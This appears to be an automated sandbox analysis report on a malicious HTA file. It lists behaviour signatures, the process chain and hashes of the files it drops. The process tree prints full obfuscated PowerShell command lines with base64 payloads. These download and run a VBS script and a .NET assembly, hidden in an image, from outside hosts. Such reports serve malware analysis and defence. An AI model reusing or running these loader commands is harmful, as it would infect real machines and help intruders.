Analysis

  • max time kernel
    119s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    04-02-2025 19:17

General

  • Target

    shemygoodgirlwholovesmebestthignstobegoodforrmes.hta

  • Size

    14KB

  • MD5

    b88c259e79f89b18020b2af11487b53e

  • SHA1

    632d89122dba2718319d2ae64f3ba8b73c557614

  • SHA256

    76b6dfd52c8e728a974bb6122564ca779d8811cd3160dd20557a2a2228c23974

  • SHA512

    b05ad7b57c73bb5ac905fe94b2b6c951bd534d4351ee4e5fd2c9e78912b7a3c40e21b5479dc3b4cea2ccfca73e9379e40a9d39bd63f05be30c785c31717ba183

  • SSDEEP

    96:fSwF8+hkwF7+h9GjQIwX7fW2fswFDwFW+hTwFB+:qsvKsKPG0b7+BsDspVsw

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Evasion via Device Credential Deployment 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\shemygoodgirlwholovesmebestthignstobegoodforrmes.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2972
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/c pOWersHELl.ExE -Ex bypasS -nop -W 1 -c DEViCEcreDentIALDePloYmenT ; Iex($(iex('[SysteM.tEXT.ENCOding]'+[Char]0X3A+[ChAr]58+'Utf8.gEtStrIng([sySTeM.CoNveRT]'+[ChAR]58+[cHAr]0X3a+'FrOMbAsE64stRiNG('+[ChAR]34+'JGszTnUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYkVyREVGSU5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWW5qeCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcXFxZHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdPLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUVGLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJCR2tsQUhCdVF5WSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZk5xUUd1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGszTnU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xODUuMjkuMTAuMzAveGFtcHAva2tucy9zaGVpc215YmVhdXRpZnVsbGFkeXdob2xvdmVzbWUuZ0lGIiwiJGVOdjpBUFBEQVRBXHNoZWlzbXliZWF1dGlmdWxsYWR5d2hvbG92ZXNtYmVhdXRpZnVsbGFkLnZicyIsMCwwKTtzVGFSdC1zbEVFUCgzKTtJTnZPa2UtSXRlTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHNoZWlzbXliZWF1dGlmdWxsYWR5d2hvbG92ZXNtYmVhdXRpZnVsbGFkLnZicyI='+[ChAR]34+'))')))"
      2⤵
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2308
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        pOWersHELl.ExE -Ex bypasS -nop -W 1 -c DEViCEcreDentIALDePloYmenT ; Iex($(iex('[SysteM.tEXT.ENCOding]'+[Char]0X3A+[ChAr]58+'Utf8.gEtStrIng([sySTeM.CoNveRT]'+[ChAR]58+[cHAr]0X3a+'FrOMbAsE64stRiNG('+[ChAR]34+'JGszTnUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtVHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNYkVyREVGSU5JVGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMTU9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWW5qeCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcXFxZHosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGdPLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYUVGLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJCR2tsQUhCdVF5WSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZk5xUUd1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGszTnU6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xODUuMjkuMTAuMzAveGFtcHAva2tucy9zaGVpc215YmVhdXRpZnVsbGFkeXdob2xvdmVzbWUuZ0lGIiwiJGVOdjpBUFBEQVRBXHNoZWlzbXliZWF1dGlmdWxsYWR5d2hvbG92ZXNtYmVhdXRpZnVsbGFkLnZicyIsMCwwKTtzVGFSdC1zbEVFUCgzKTtJTnZPa2UtSXRlTSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHNoZWlzbXliZWF1dGlmdWxsYWR5d2hvbG92ZXNtYmVhdXRpZnVsbGFkLnZicyI='+[ChAR]34+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2116
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nnle1uhq.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2680
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF8E1.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF8E0.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2800
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\sheismybeautifulladywholovesmbeautifullad.vbs"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3004
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAD0AIAAnAHQAeAB0AC4AZQBtAGkAdABlAHIAaQB0AG4AZQBoAHQAaQB3AGUAcgB1AHQAYwBpAHAAdABzAGUAYgB5AG0AZQBlAHMALwBzAG4AawBrAC8AcABwAG0AYQB4AC8AMAAzAC4AMAAxAC4AOQAyAC4ANQA4ADEALwAvADoAcAB0AHQAaAAnADsAJAByAGUAcwB0AG8AcgBlAGQAVABlAHgAdAAgAD0AIAAkAG8AcgBpAGcAaQBuAGEAbABUAGUAeAB0ACAALQByAGUAcABsAGEAYwBlACAAJwAjACcALAAgACcAdAAnADsAJABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBlAHMALgBjAGwAbwB1AGQAaQBuAGEAcgB5AC4AYwBvAG0ALwBkAG0AdwBuAG0AZQBtAGMAbQAvAGkAbQBhAGcAZQAvAHUAcABsAG8AYQBkAC8AdgAxADcAMwA4ADYANAAwADAAOQA2AC8AeAA5AGUAdwB0AGwAZQBtAGYAcABoAGYAdwB2AGYAcwA4ADMAcwBzAC4AagBwAGcAJwA7ACQAdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAaQBtAGEAZwBlAEIAeQB0AGUAcwAgAD0AIAAkAHcAZQBiAEMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAkAGkAbQBhAGcAZQBVAHIAbAApADsAJABpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7ACQAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAGUAbgBkAEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AJwA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAcwB0AGEAcgB0AEYAbABhAGcAKQA7ACQAZQBuAGQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABlAG4AZABGAGwAYQBnACkAOwAkAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABlAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgACQAcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7ACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAIAA9ACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAAJABiAGEAcwBlADYANABMAGUAbgBnAHQAaAApADsAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACkAOwAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAJAB0AHkAcABlACAAPQAgAFsAQwBsAGEAcwBzAEwAaQBiAHIAYQByAHkAMQAuAEgAbwBtAGUAXQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBtAGEAaQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdACAAQAAoACQAcgBlAHMAdABvAHIAZQBkAFQAZQB4AHQALAAnAGYAYQBsAHMAZQAnACwAJwBDAGEAcwBQAG8AbAAnACwAJwBmAGEAbABzAGUAJwApACkA')) | Invoke-Expression"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1460

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\Cab171B.tmp

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\Local\Temp\RESF8E1.tmp

    Filesize

    1KB

    MD5

    c5b2b20aac4d0306b218e52c0a80f28c

    SHA1

    48f41073470f76c376f9005a2fa8358fa5149f4e

    SHA256

    ea2601184c85bc54c6568662df493277ec325d40c0a320070ee42176f056d7a5

    SHA512

    b51ae4ebde6d9847be0ae12787acfba0c5820972d8ff2c0e215b9e7dd624ecc4a6b49fe12a38bc63e7ff0277b786ed1b0dee479adc12d651202626c74212ba5c

  • C:\Users\Admin\AppData\Local\Temp\Tar177C.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • C:\Users\Admin\AppData\Local\Temp\nnle1uhq.dll

    Filesize

    3KB

    MD5

    d2715fe95c7f30afd03c342b04f4d525

    SHA1

    d8c67922598aba2c5e6deb79f9c7edbffa59e03b

    SHA256

    1eb3874b64f577f658512d7e57ea2d2ea3233a9781d86ffcd21ae5806b512349

    SHA512

    43d1ce442ef792dd94a7df62c4659f15bb9d3227fa2324861ced06c547ab456651d900f2f363dc0939ce2bc262d49276102fd65be1cddab02c587e76dde44248

  • C:\Users\Admin\AppData\Local\Temp\nnle1uhq.pdb

    Filesize

    7KB

    MD5

    33917942561568d3cf629ba370e240a7

    SHA1

    84397ba6ece8eab37a2380abadc6a571dcf4d60b

    SHA256

    207f3887b16994a4ea70b2ce7128eaa969c75220f0bc451d42636606e0669da0

    SHA512

    3d9f902f7de6c010281240af3ad458da5d78f081f57cb25cd0fb64dd8b9f04b8b0e4d2c89e258276e5f487adfa2b51e5f3ec02d3013316b952564a0706ce1dc3

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    d96538df4afa6108efeba5a8121442df

    SHA1

    e0999e3d637040f8e0c55135fabafcca791e8005

    SHA256

    66558c2d541afd6d1bef38a828609c0830f740d17193ec04bd0f2945620795eb

    SHA512

    3e60b69738962d7022a3099605793b139608a08c9517df50083cfb026b631ee74dbc4ce06459c806d9283a1ccdde600f55690bad645827c2252956ba4cfb6c92

  • C:\Users\Admin\AppData\Roaming\sheismybeautifulladywholovesmbeautifullad.vbs

    Filesize

    209KB

    MD5

    7dcf0b4585dd514d6320f1380cdf323c

    SHA1

    9800ed24aae82b984034dab184b0a2df4a21a81e

    SHA256

    f4f1b9da47072e15e360050cc4c3a78f6d1d7fe9c2695bd0b6680a1e2acb0987

    SHA512

    2d9d0d25992aa555f1e17995a73c3d610b8a170bcff4921184f8d54d78c23eb4e63acbd321367f583beaec260b3dd81b0a213931be47bc11612b4460e816d4b1

  • \??\c:\Users\Admin\AppData\Local\Temp\CSCF8E0.tmp

    Filesize

    652B

    MD5

    a9212162df247e626cc199c98bfae52c

    SHA1

    d35167610cf7e9fc4628f6f0d1a0443ba6e9f237

    SHA256

    48d05f40662e0ecf877ce3c2edf347e222929e319c2c842ffa841b27be2b7a78

    SHA512

    1f131721dda5d2fd98dd8658e9c5ba927b93e74ce734425e5205a0b87131472685fb79167b69d53251fcf2390e9141c476312343302c645e03aeb8828613054d

  • \??\c:\Users\Admin\AppData\Local\Temp\nnle1uhq.0.cs

    Filesize

    476B

    MD5

    5b2e7d35de72278f9da88c640f9e7481

    SHA1

    e5d0eb3c997e4bbb1e3e9f001858a6bd34019465

    SHA256

    5bb90192a83dd9ead0f6a41f002ac0cf6a9e4e7c3acaf08e9f8bf7b5947384c0

    SHA512

    e335d94e966c71e40f87b4bd595ce365b54992ce97aa33b0181ded2d19ec7f8fed59540215556e78181a39a714854d33f0aa6de506df2c1fc19f35e7d7a40d56

  • \??\c:\Users\Admin\AppData\Local\Temp\nnle1uhq.cmdline

    Filesize

    309B

    MD5

    48bea1b41b3790d8bea69202fa799039

    SHA1

    3a17b731131116b2ab7d15d9136cb153eaa1c941

    SHA256

    d894cb762e1f425d090bdf5c186bb8f64b94bd0c51eb88843e1c492f70158051

    SHA512

    01bfb4a21363353962d7e59db2487b53c2a005516648b25e63c20ade47e68ccbf74eaa1e3095372542cd4ecef846a93ed64090b70190a1709196c0932bf8b2c1